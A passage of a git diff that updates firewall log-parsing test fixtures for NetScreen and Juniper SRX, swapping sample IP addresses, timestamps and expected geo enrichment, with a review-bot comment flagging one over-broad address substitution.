+ "ingested": "2021-12-10T10:13:47.070870200Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -963,7 +963,7 @@
 {
 "message": "iat: NetScreen device_id=orain [equaturQ]system-low-00554: SCAN-MGR: Attempted to load AV pattern file created quia after the AV subscription expired. (Exp: Exce)",
 "event": {
- "ingested": "2021-12-06T12:25:17.286428135Z"
+ "ingested": "2021-12-10T10:13:47.070878900Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -975,7 +975,7 @@
 {
 "message": "dese: NetScreen device_id=ptasn [liqui]system-low-00541: ScreenOS invol serial # Loremips: Asset recovery has been cidun",
 "event": {
- "ingested": "2021-12-06T12:25:17.286431331Z"
+ "ingested": "2021-12-10T10:13:47.070887700Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -987,7 +987,7 @@
 {
 "message": "ole: NetScreen device_id=odi [tper]system-medium-00628(ectetur): audit log queue Event Log is overwritten (2019-4-15 07:40:49)",
 "event": {
- "ingested": "2021-12-06T12:25:17.286434657Z"
+ "ingested": "2021-12-10T10:13:47.070896400Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -999,7 +999,7 @@
 {
 "message": "iadolo: NetScreen device_id=ecatcup [No Name]system-high-00628: audit log queue Traffic Log is overwritten (2019-4-29 14:43:23)",
 "event": {
- "ingested": "2021-12-06T12:25:17.286437793Z"
+ "ingested": "2021-12-10T10:13:47.070905300Z"
 },
 "ecs": {
 "version": "1.12.0" 
@@ -1011,7 +1011,7 @@
 {
 "message": "qui: NetScreen device_id=iaecon [dminima]system-high-00538(psaquaea): NACN failed to register to Policy Manager eabillo because of success",
 "event": {
- "ingested": "2021-12-06T12:25:17.286440949Z"
+ "ingested": "2021-12-10T10:13:47.070914100Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1023,7 +1023,7 @@
 {
 "message": "eosqu: NetScreen device_id=reetdolo [umquam]system-low-00075(enderi): The local device labore in the Virtual Security Device group uasiarch changed state from iamquisn to inoperable. (2019-5-28 04:48:31)",
 "event": {
- "ingested": "2021-12-06T12:25:17.286444375Z"
+ "ingested": "2021-12-10T10:13:47.070923100Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1035,7 +1035,7 @@
 {
 "message": "veleumi: NetScreen device_id=volupt [equ]system-high-00535(ure): SCEP_FAILURE message has been received from the CA",
 "event": {
- "ingested": "2021-12-06T12:25:17.286447982Z"
+ "ingested": "2021-12-10T10:13:47.070931200Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1047,7 +1047,7 @@
 {
 "message": "reseo: NetScreen device_id=entoreve [rudexer]system-medium-00026(iruredol): IKE iad: Missing heartbeats have exceeded the threshold. All Phase 1 and 2 SAs have been removed",
 "event": {
- "ingested": "2021-12-06T12:25:17.286451018Z"
+ "ingested": "2021-12-10T10:13:47.070936800Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1059,7 +1059,7 @@
 {
 "message": "ptate: NetScreen device_id=oloreeu [imipsa]system-high-00038: OSPF routing instance in vrouter uame taevitae",
 "event": {
- "ingested": "2021-12-06T12:25:17.286454023Z"
+ "ingested": "2021-12-10T10:13:47.070942900Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1071,7 +1071,7 @@
 {
 "message": "archi: NetScreen device_id=caboNe [ptate]system-high-00003(ius): Multiple authentication failures have been detected!",
 "event": {
- "ingested": "2021-12-06T12:25:17.286457099Z"
+ "ingested": "2021-12-10T10:13:47.070952Z"
 },
 "ecs": {
 "version": "1.12.0" 
@@ -1083,7 +1083,7 @@
 {
 "message": "remap: NetScreen device_id=ntium [veniamqu]system-high-00529: DNS entries have been refreshed by HA",
 "event": {
- "ingested": "2021-12-06T12:25:17.286460095Z"
+ "ingested": "2021-12-10T10:13:47.070960900Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1095,7 +1095,7 @@
 {
 "message": "llumdo: NetScreen device_id=tot [itquii]system-high-00625(erspici): Session (id oreeu src-ip 10.126.150.15 dst-ip 10.185.50.112 dst port 7180) route is invalid. (2019-8-21 23:03:57)",
 "event": {
- "ingested": "2021-12-06T12:25:17.286476516Z"
+ "ingested": "2021-12-10T10:13:47.070969800Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1107,7 +1107,7 @@
 {
 "message": "quepo: NetScreen device_id=tDuisa [iscive]system-medium-00521: Can't connect to E-mail server 10.152.90.59",
 "event": {
- "ingested": "2021-12-06T12:25:17.286483128Z"
+ "ingested": "2021-12-10T10:13:47.070978700Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1119,7 +1119,7 @@
 {
 "message": "lorem: NetScreen device_id=icons [hende]system-low-00077(usBonor): HA link disconnect. Begin to use second path of HA",
 "event": {
- "ingested": "2021-12-06T12:25:17.286487486Z"
+ "ingested": "2021-12-10T10:13:47.070985400Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1131,7 +1131,7 @@
 {
 "message": "preh: NetScreen device_id=dol [No Name]system-low-00625: Session (id gnamal src-ip 10.119.181.171 dst-ip 10.166.144.66 dst port 3051) route is invalid. (2019-10-3 20:11:40)",
 "event": {
- "ingested": "2021-12-06T12:25:17.286492175Z"
+ "ingested": "2021-12-10T10:13:47.070991600Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1143,7 +1143,7 @@
 {
 "message": "avolup: NetScreen device_id=litse [archit]system-high-00041(untutlab): A route-map name in virtual router estqu has been removed",
 "event": {
- "ingested": "2021-12-06T12:25:17.286496192Z"
+ "ingested": "2021-12-10T10:13:47.071000600Z"
 },
 "ecs": {
 "version": "1.12.0" 
@@ -1155,7 +1155,7 @@
 {
 "message": "eddoeiu: NetScreen device_id=consect [eetdolo]system-medium-00038(remipsum): OSPF routing instance in vrouter ons emporin",
 "event": {
- "ingested": "2021-12-06T12:25:17.286499529Z"
+ "ingested": "2021-12-10T10:13:47.071009500Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1167,7 +1167,7 @@
 {
 "message": "texpl: NetScreen device_id=isquames [No Name]system-low-00021: DIP port-translation stickiness was atio by utla via ntm from host 10.96.165.147 to 10.96.218.99:277 (2019-11-15 17:19:22)",
 "event": {
- "ingested": "2021-12-06T12:25:17.286503707Z"
+ "ingested": "2021-12-10T10:13:47.071018300Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1179,7 +1179,7 @@
 {
 "message": "elaudant: NetScreen device_id=ratvolu [odte]system-medium-00021(eum): DIP port-translation stickiness was uidol by repr via idu from host 10.201.72.59 to 10.230.29.67:7478 (2019-11-30 00:21:57)",
 "event": {
- "ingested": "2021-12-06T12:25:17.286507103Z"
+ "ingested": "2021-12-10T10:13:47.071027200Z"
 },
 "ecs": {
 "version": "1.12.0"
@@ -1191,7 +1191,7 @@
 {
 "message": "toc: NetScreen device_id=rau [sciuntN]system-low-00602: PIMSM Error in initializing interface state change",
 "event": {
- "ingested": "2021-12-06T12:25:17.286510379Z"
+ "ingested": "2021-12-10T10:13:47.071035800Z"
 },
 "ecs": {
 "version": "1.12.0"
diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log
index 4ef6659737f..b68951f25bd 100644
--- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log
+++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log 
@@ -1,4 +1,4 @@
-<14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="10.10.10.1" source-port="57116" destination-address="89.160.20.112" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"]
-<14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="192.0.2.0" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"]
-<11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="192.0.2.0" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"]
-<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="1.1.1.1" source-port="60148" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"]
+<14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 
http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="10.10.10.1" source-port="57116" destination-address="67.43.156.14" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"]
+<14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="192.168.2.0" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"]
+<11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="192.168.2.0" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"]
+<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="67.43.156.15" source-port="60148" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"] 
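Review bot: The fourth new line rewrites the structured-data ID `[junos@2636.1.1.1.2.129` to `[junos@67.43.156.15`, which replaces the Juniper enterprise-number form that the other fixture lines keep (`junos@2636.1.1.1.2.134` in test-flow.log) with an IP-shaped value, presumably from an over-broad `1.1.1.1` substitution. Only `source-address` needed the new address, so I would restore `[junos@2636.1.1.1.2.129 hostname="dummy_host"` on that line (and its copy in `event.original` of test-atp.log-expected.json) so the fixture still exercises the real SD-ID format. Separately, `192.0.2.0` on the second and third lines was an RFC 5737 TEST-NET-1 documentation address; if the allowed subset this commit targets does not include that range then `192.168.2.0` is fine, but it is worth confirming, since the documentation ranges are the conventional choice for fixture values that need no geo enrichment.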
diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json
index d24f1c01b47..85bf03ddb14 100644
--- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json
+++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json
@@ -3,32 +3,26 @@
 {
 "server": {
 "port": 80,
- "ip": "89.160.20.112"
+ "ip": "67.43.156.14"
 },
 "log": {
 "level": "informational"
 },
 "destination": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "SE-E",
- "city_name": "Linköping",
- "country_iso_code": "SE",
- "country_name": "Sweden",
- "region_name": "Östergötland County",
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
 "location": {
- "lon": 15.6167,
- "lat": 58.4167
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 29518,
- "organization": {
- "name": "Bredband2 AB"
- }
+ "number": 35908
 },
 "port": 80,
- "ip": "89.160.20.112"
+ "ip": "67.43.156.14"
 },
 "source": {
 "port": 57116,
@@ -83,7 +77,7 @@
 ],
 "ip": [
 "10.10.10.1",
- "89.160.20.112"
+ "67.43.156.14"
 ]
 },
 "client": { 
@@ -92,8 +86,8 @@
 },
 "event": {
 "severity": 14,
- "ingested": "2021-12-06T12:25:18.976147371Z",
- "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"10.10.10.1\" source-port=\"57116\" destination-address=\"89.160.20.112\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]",
+ "ingested": "2021-12-10T10:13:49.798358700Z",
+ "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"10.10.10.1\" source-port=\"57116\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]",
 "kind": "alert",
 "action": "malware_detected",
 "category": [
@@ -127,7 +121,7 @@
 "host.example.com"
 ],
 "ip": [
- "192.0.2.0"
+ "192.168.2.0"
 ]
 },
 "log": {
@@ -138,7 +132,7 @@
 "name": "admin"
 },
 "domain": "host.example.com",
- "ip": "192.0.2.0"
+ "ip": "192.168.2.0"
 },
 "juniper": {
 "srx": { 
@@ -153,8 +147,8 @@
 },
 "event": {
 "severity": 14,
- "ingested": "2021-12-06T12:25:18.976160776Z",
- "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"192.0.2.0\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]",
+ "ingested": "2021-12-10T10:13:49.798372100Z",
+ "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"192.168.2.0\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]",
 "kind": "alert",
 "action": "malware_detected",
 "category": [
@@ -188,7 +182,7 @@
 "host.example.com"
 ],
 "ip": [
- "192.0.2.0"
+ "192.168.2.0"
 ]
 },
 "log": {
@@ -196,7 +190,7 @@
 },
 "source": {
 "domain": "host.example.com",
- "ip": "192.0.2.0"
+ "ip": "192.168.2.0"
 },
 "juniper": {
 "srx": { 
@@ -214,8 +208,8 @@
 },
 "event": {
 "severity": 11,
- "ingested": "2021-12-06T12:25:18.976163761Z",
- "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"192.0.2.0\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]",
+ "ingested": "2021-12-10T10:13:49.798377Z",
+ "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"192.168.2.0\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]",
 "kind": "alert",
 "category": [
 "network",
@@ -244,8 +238,20 @@
 "ip": "10.0.0.1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 60148,
- "ip": "1.1.1.1",
+ "ip": "67.43.156.15",
 "domain": "dummy_host"
 },
 "juniper": { 
@@ -292,18 +298,18 @@
 "dummy_host"
 ],
 "ip": [
- "1.1.1.1",
+ "67.43.156.15",
 "10.0.0.1"
 ]
 },
 "client": {
 "port": 60148,
- "ip": "1.1.1.1"
+ "ip": "67.43.156.15"
 },
 "event": {
 "severity": 165,
- "ingested": "2021-12-06T12:25:18.976166166Z",
- "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"1.1.1.1\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]",
+ "ingested": "2021-12-10T10:13:49.798383500Z",
+ "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"67.43.156.15\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]",
 "kind": "event",
 "category": [
 "network"
diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log
index 5ba1845ff99..aa521a40fa1 100644 
--- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log
+++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log 
@@ -1,25 +1,25 @@
-<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
-<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
-<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address="89.160.20.112" source-port="56639" destination-address="89.160.20.112" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "]
-<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason="unset" source-address="89.160.20.112" source-port="63456" destination-address="89.160.20.112" destination-port="902" service-name="None" nat-source-address="89.160.20.112" nat-source-port="63456" nat-destination-address="89.160.20.112" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] -<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address="89.160.20.112" source-port="24065" destination-address="81.2.69.193" destination-port="768" service-name="icmp" nat-source-address="89.160.20.112" nat-source-port="24065" nat-destination-address="81.2.69.193" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] -<14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address="192.0.2.1" source-port="1" destination-address="89.160.20.112" destination-port="46384" service-name="icmp" nat-source-address="192.0.2.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" 
packet-incoming-interface="ge-0/0/1.0"] -<14>1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason="response received" source-address="192.0.2.1" source-port="1" destination-address="89.160.20.112" destination-port="46384" service-name="icmp" nat-source-address="192.0.2.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"] -<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="89.160.20.112" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="89.160.20.112" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] -<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason="TCP RST" source-address="192.168.2.164" 
source-port="53232" destination-address="172.16.1.19" destination-port="445" service-name="junos-smb" nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] -<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason="idle Timeout" source-address="89.160.20.112" source-port="52890" destination-address="89.160.20.112" destination-port="53" service-name="junos-dns-udp" nat-source-address="89.160.20.112" nat-source-port="11152" nat-destination-address="89.160.20.112" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] -<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="89.160.20.112" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="89.160.20.112" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" 
policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"] -<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address="81.2.69.193" source-port="3129" destination-address="89.160.20.112" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="81.2.69.193" nat-source-port="14406" nat-destination-address="89.160.20.112" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address="81.2.69.193" source-port="3129" destination-address="89.160.20.112" destination-port="21" 
